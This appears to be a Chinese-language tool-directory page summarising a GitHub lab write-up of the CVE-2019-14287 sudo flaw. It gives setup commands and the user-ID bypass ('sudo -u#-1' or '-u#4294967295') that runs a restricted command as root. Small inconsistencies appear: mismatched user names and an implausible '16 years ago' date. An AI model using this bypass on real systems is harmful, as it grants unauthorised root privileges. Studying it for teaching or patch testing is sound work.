Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-14287-write-up — CVE-2019-14287 sudo漏洞的逐步演示,该漏洞允许受限用户通过精心构造的用户ID以root身份执行命令。 | Kitploit
工具/GitHubGitHub/gurneesh/cve-2019-14287-write-up
权限提升漏洞分析漏洞利用渗透测试学习与教育
GitHubgurneesh/cve-2019-14287-write-up

CVE-2019-14287-write-up

CVE-2019-14287 sudo漏洞的逐步演示,该漏洞允许受限用户通过精心构造的用户ID以root身份执行命令。

查看仓库
16年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-14287 漏洞利用说明

4294967295 Sudo 漏洞允许受限用户以 root 身份运行命令

漏洞演示

添加新用户:

sudo su - root useradd -m -s /bin/bash testuser passwd testuser // 为用户添加密码 visudo

添加新条目

test ALL=(ALL, !root) /usr/bin/id // 指定此用户不能使用 root 用户执行 id 命令

保存文件并退出 root 用户

登录到测试用户

sudo su - test

执行命令

sudo id 您将看到消息:Sorry, user test is not allowed to execute '/usr/bin/id' as root

现在执行命令

sudo -u#-1 id OR sudo -u#4294967295 id

就是这样,您已经使用 root 执行了 id 命令

下载工具